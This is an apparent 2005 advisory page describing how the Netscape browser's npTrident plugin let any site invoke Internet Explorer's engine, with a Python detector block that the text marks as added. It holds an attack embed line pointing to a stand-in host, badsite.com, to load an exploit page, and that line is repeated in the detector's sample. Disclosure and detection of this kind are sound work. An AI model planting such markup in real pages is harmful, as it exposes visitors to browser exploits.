Vulnerability in Firefox-based Netscape Browser [fixed]

Update 18/01/05: I've been told that this vulnerability has been fixed in the latest preview release of the browser.

This page demonstrates a security vulnerability present in the new Firefox-based Netscape Browser. One of its main features is that it allows you to display pages either with the default Gecko rendering engine or with Internet Explorer's Trident engine. You can switch engines on the fly, or have Netscape remember settings for certain sites.

To allow Trident to be embedded in the browser, Netscape ships with a plugin called npTrident. Unfortunately, this plugin can be embedded by any website. This means that the browser is potentially vulnerable to any holes present in the IE rendering engine, even if the user is browsing with Gecko. A site would simply have to insert the following code, pointing to a page containing an IE exploit:

<embed name="plugin" src="http://www.badsite.com" type="text/html" />
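
A defender-side check for the markup above, as an added example that is not part of the original page: it scans a page's HTML for embed elements whose type resolves to text/html, which is how the snippet invokes the plugin. The function and constant names are hypothetical, the sample HTML is constructed, and matching on the type attribute alone is an assumption drawn from that snippet.

```python
from html.parser import HTMLParser

# Assumption: the plugin is selected by the MIME type given in the embed
# element's type attribute, as in the page's snippet (type="text/html").
PLUGIN_MIME = "text/html"


def _mime(value):
    """Normalise a type attribute: drop parameters, whitespace and case."""
    return (value or "").split(";", 1)[0].strip().lower()


class _EmbedFinder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so <EMBED TYPE=...>
        # is caught too; self-closing <embed ... /> also arrives here.
        if tag != "embed":
            return
        attr = dict(attrs)
        if _mime(attr.get("type")) == PLUGIN_MIME:
            line = self.getpos()[0]
            self.findings.append((line, attr.get("src") or ""))


def find_plugin_embeds(html):
    """Return (line, src) for each embed that would be handed to the plugin."""
    finder = _EmbedFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample input: two matching embeds and two that must not match.
SAMPLE = """<html><body>
<p>ordinary page content</p>
<embed name="plugin" src="http://www.badsite.com" type="text/html" />
<EMBED SRC="movie.swf" TYPE="application/x-shockwave-flash">
<embed src="/local/page.html" type=" Text/HTML; charset=utf-8 ">
<embed src="no-type.bin">
</body></html>"""

if __name__ == "__main__":
    for line, src in find_plugin_embeds(SAMPLE):
        print(f"line {line}: embed type=text/html src={src!r}")
```

A check like this fits a filtering proxy or a crawl of sites you host; it only inspects static markup, so elements created by script at runtime are out of its reach.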

Of course, this new Netscape version is only a preview release, but I'm surprised none of the developers spotted this (unless it's a deliberate 'feature'). Browser security has been such a big issue over the last year, and embedding IE is like playing with fire. I'm not saying it's a bad idea per se, but it has to be done well, and as securely as possible.